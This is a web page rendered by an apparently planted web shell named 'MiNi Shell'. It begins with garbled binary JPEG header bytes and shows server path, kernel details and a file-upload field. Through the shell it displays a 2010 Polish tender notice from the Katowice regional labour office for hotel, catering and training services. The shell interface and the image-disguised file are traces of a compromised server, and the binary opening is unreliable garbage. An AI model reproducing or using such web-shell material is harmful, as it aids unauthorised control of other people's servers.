JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100323/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100323/64153-N-2010.html

<p class="kh_header"><b>Katowice: świadczenie usługi hotelarsko-restauracyjnej i szkoleniowej</b><br>
<b>Numer ogłoszenia: 64153 - 2010; data zamieszczenia: 23.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usługi hotelarsko-restauracyjnej i szkoleniowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - USŁUGA HOTELOWO - RESTAURACYJNA

Przedmiotu zamówienia jest usługa hotelarsko-restauracyjna podczas dwudniowego szkolenia wyjazdowego w terminie 14-15 kwietnia br., w ramach porozumienia zawartego z Powiatowymi Urzędami Pracy Województwa Śląskiego 
z zakresu -Prawo zamówień publicznych-nowelizacja-. Szkolenie ma zostać zorganizowane na terenie woj. śląskiego w regionie podbeskidzia w hotelu 
o standardzie co najmniej trzygwiazdkowym. 
W szkoleniu uczestniczyć będzie 36 osób, w tym: 31 pracowników PUP 
i 4 pracowników WUP w Katowicach oraz wykładowca. Ostateczna ilość pracowników biorących udział w szkoleniu zostanie podana nie później niż na trzy dni kalendarzowe przed planowanym terminem szkolenia.

Wykonawca w celu prawidłowej realizacji przedmiotu zamówienia powinien zapewnić:

1.	zakwaterowanie w pokojach z pełnym węzłem sanitarnym: 
a)	jednoosobowych - 26 
b)	dwuosobowych - 5
Pokoje powinny mieć powierzchnię min. 10 m2 (pokoje 1 - osobowe) lub 14 m2. W pokojach 2 - osobowych powinny znajdować się 2 łóżka. Minimalne wyposażenie pokoi (1 i 2 - osobowych): łóżko lub łóżka, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, biurko lub stół, krzesło lub inny mebel do siedzenia (nie mniej niż 2 na pokój), lustro, wieszak na okrycie wierzchnie, telewizor. Wszystkie pokoje powinny posiadać łazienki wyposażone min w: wannę z baterią i natryskiem lub kabinę natryskową, umywalkę z blatem lub półką, WC, zestaw ręczników.  

2.	zapewnienie dla uczestników pełnego wyżywienia, przy czym usługa restauracyjna rozpoczyna się od:
- przerwy kawowej z bufetem kanapkowym w dniu przyjazdu
- zakończy się obiadem w ostatnim dniu pobytu.

Śniadania, obiady i kolacje powinny być podawane w innej sali niż sala wykładowa, w tym dla każdego uczestnika szkolenia:  
= 1 śniadanie w formie szwedzkiego bufetu, w tym co najmniej:
- pieczywo różnorodne, 
- danie na ciepło: jajecznica, kiełbaski na gorąco,
- wędliny różnorodne,
- sery różnorodne: żółte, pleśniowe, białe,
- dżemy,
- mleko: ciepłe, zimne,
- przetwory jogurtowe, 
- płatki śniadaniowe,
- świeże warzywa: pomidory, ogórek zielony,
- napoje różnorodne: kawa, herbata, soki, woda mineralna gazowana i niegazowana,
- dodatki: cytryna, cukier, mleko, masło, margaryna.

Śniadanie dla każdego uczestnika powinno być podane na zastawie ceramicznej 
z kompletem sztućców metalowych i serwetek. 
= 2 obiady w tym każdy składający się z: 
- zupy,
- dania głównego (mięsne z dodatkiem ziemniaków lub ryżu i zestawu surówek),
- deser,
- napoje: kawa, herbata, soki, woda mineralna gazowana i niegazowana,
- dodatki: cytryna, cukier, mleko.

Wszystkie składniki obiadu podawanego pierwszego dnia szkolenia powinny być różne od składników obiadu podawanego w drugim dniu szkolenia. 
Obiad dla każdego uczestnika powinien być podany na ciepło na zastawie ceramicznej z kompletem sztućców metalowych i serwetek. Obiad może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu. 
= 3 przerwy kawowe - 2 przerwy w pierwszym dniu szkolenia, przy czym pierwsza z nich dodatkowo zawierać będzie bufet kanapkowy: kanapki tartinki różnorodne oraz 1 przerwa w drugim dniu szkolenia, w tym każda składająca się z: 
- wyrobów cukierniczych różnorodnych,
- napojów: kawa, herbata, soki, woda mineralna gazowana i niegazowana,
- dodatków: cytryna, cukier, mleko.
= 1 kolacja składająca się z:
- przystawki,
- dania głównego podanego na ciepło,
-zimnej płyty składającej się z różnorodnych: wędlin, serów, warzyw marynowanych, śledzi, 
3 rodzajów sałatek w tym: grecka, z kurczakiem, z tuńczykiem,
- napojów różnorodnych: kawa, herbata, soki, woda mineralna gazowana  i niegazowana
- dodatków: cytryna, cukier, mleko.
Wszystkie składniki kolacji powinny być różne od składników obiadów podawanych podczas dwóch dni szkolenia. 
Kolacja dla każdego uczestnika powinna być podana na zastawie ceramicznej z kompletem sztućców metalowych i serwetek. 

3) Salę szkoleniową w układzie bankietowym o wielkości odpowiedniej do ilości osób, w miejscu zakwaterowania, wyposażoną w sprzęt niezbędny do przeprowadzenia szkolenia, w tym: laptop, rzutnik multimedialny oraz tablicę, 

4) Miejsca parkingowe.


Część II
USŁUGA SZKOLENIOWA

Przedmiotem zamówienia jest usługa szkoleniowa podczas dwudniowego szkolenia wyjazdowego w terminie 14-15 kwietnia br., w ramach porozumienia zawartego 
z Powiatowymi Urzędami Pracy Województwa Śląskiego z zakresu -Prawo zamówień publicznych-nowelizacja-. Szkolenie ma zostać zorganizowane na terenie woj. śląskiego w regionie podbeskidzia.
W szkoleniu uczestniczyć będzie 35 osób, w tym: 31 pracowników PUP, 
4 pracowników WUP w Katowicach. Ostateczna ilość pracowników biorących udział w szkoleniu zostanie podana nie później niż na trzy dni kalendarzowe przed planowanym terminem szkolenia.

Szkolenie ma zostać przeprowadzone przez Wykonawcę, który przeprowadził co najmniej 10 szkoleń w zakresie ustawy prawo zamówień publicznych o wartości nie mniejszej niż 1 000,- zł każde, oraz dysponuje  osobą - wykładowcą, który przeprowadził co najmniej 10 szkoleń w zakresie ustawy prawo zamówień publicznych.

Harmonogram ma obejmować 16 godzin szkoleniowych, przy czym godzina szkoleniowa wynosi 45 minut, a szkolenie prowadzone będzie w języku polskim. 

Wykonawca w celu prawidłowej realizacji przedmiotu zamówienia powinien  przeprowadzić szkolenie zgodnie z harmonogram szkolenia, ze szczególnym uwzględnieniem prowadzenia postępowań o udzielenie zamówienia publicznego na usługę w zakresie usług niepriorytetowych,
- przeprowadzić szkolenie z wykorzystaniem prezentacji multimedialnych,
- opracować i przygotować uczestnikom szkolenia: teczki na materiały szkoleniowe, notes, długopis, prezentację szkolenia w formie papierowej i elektronicznej, 
- wydać certyfikaty potwierdzające udział w szkoleniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 14.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część II - szkoleniowa
1)	wykażą się, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowanymi co najmniej 10 szkoleniami w zakresie ustawy prawo zamówień publicznych o wartości  nie mniejszej niż 1 000,- zł każde;

Opis sposobu dokonywania oceny spełnienia tego warunku - Wykonawca przedstawi wykaz wraz z dokumentami potwierdzającymi należyte wykonanie zrealizowanego zamówienia, a Zamawiający dokona oceny spełnienia warunku na podstawie złożonego wykazu - załącznik Nr 5.II do SIWZ, wg formuły -spełnia-nie spełnia-. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I - hotelarsko-restauracyjne
1)	dysponują pokojami:
a)	jednoosobowymi w ilości nie mniejszej niż 26,
b)	dwuosobowymi w ilości nie mniejszej niż 5;
2)	salą konferencyjną dla co najmniej 40 osób,
3)	spełniają warunki wymagane dla obiektów hotelarskich co najmniej z trzema gwiazdkami, w których są świadczone usługi hotelarskie

Opis sposobu dokonywania oceny spełnienia tego warunku
Wykonawca przedstawi oświadczenie - załącznik Nr 6.I do SIWZ, a Zamawiający dokona oceny spełnienia warunków wg formuły: -spełnia-nie spełnia-. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ II - szkoleniowe
1)	osoba, która będzie uczestniczyć w wykonywaniu zamówienia, legitymuje się przeprowadzeniem co najmniej 10 wykładów podczas szkolenia w zakresie ustawy prawo zamówień publicznych, 

Opis sposobu dokonywania oceny spełnienia tego warunku - nie dotyczy
Wykonawca przedstawi wykaz osób wraz z dokumentami, a Zamawiający dokona oceny spełnienia warunków na podstawie złożonego wykazu i dokumentów - załącznik Nr 4.II do SIWZ  - wg formuły: -spełnia-nie spełnia-. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Część I
1)	odpis decyzji administracyjnej wydanej w oparciu o ustawę o usługach turystycznych oraz rozporządzenie Ministra Gospodarki i Pracy w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie, W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dotyczy części I i II przedmiotu zamówienia
Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2). W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku braku rozstrzygnięcia, w niniejszym postępowaniu, o zamówienie publiczne lub przedłużenia procedury wyboru oferty,  w którejkolwiek z części, terminy realizacji mogą ulec zmianie, o termin nie dłuższy niż 14 dni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WUP w Katowicach, ul. Kościuszki 30, III piętro, pokój 304-305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2010 godzina 10:00, miejsce: WUP w Katowicach, ul. Kościuszki 30, III piętro, pokój 352 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świadczenie usługi hotelarsko-restauracyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I -Usługi hotelarskie i restauracyjne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. kategoria hotelu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie usługi szkoleniowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - CPV 80500000-9 Usługi szkoleniowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.05.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. ilość szkoleń wykonanych przez Wykonawcę - 25</li>
<li>3. Ilość szkoleń wykonanych przez Wykładowcę - 25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com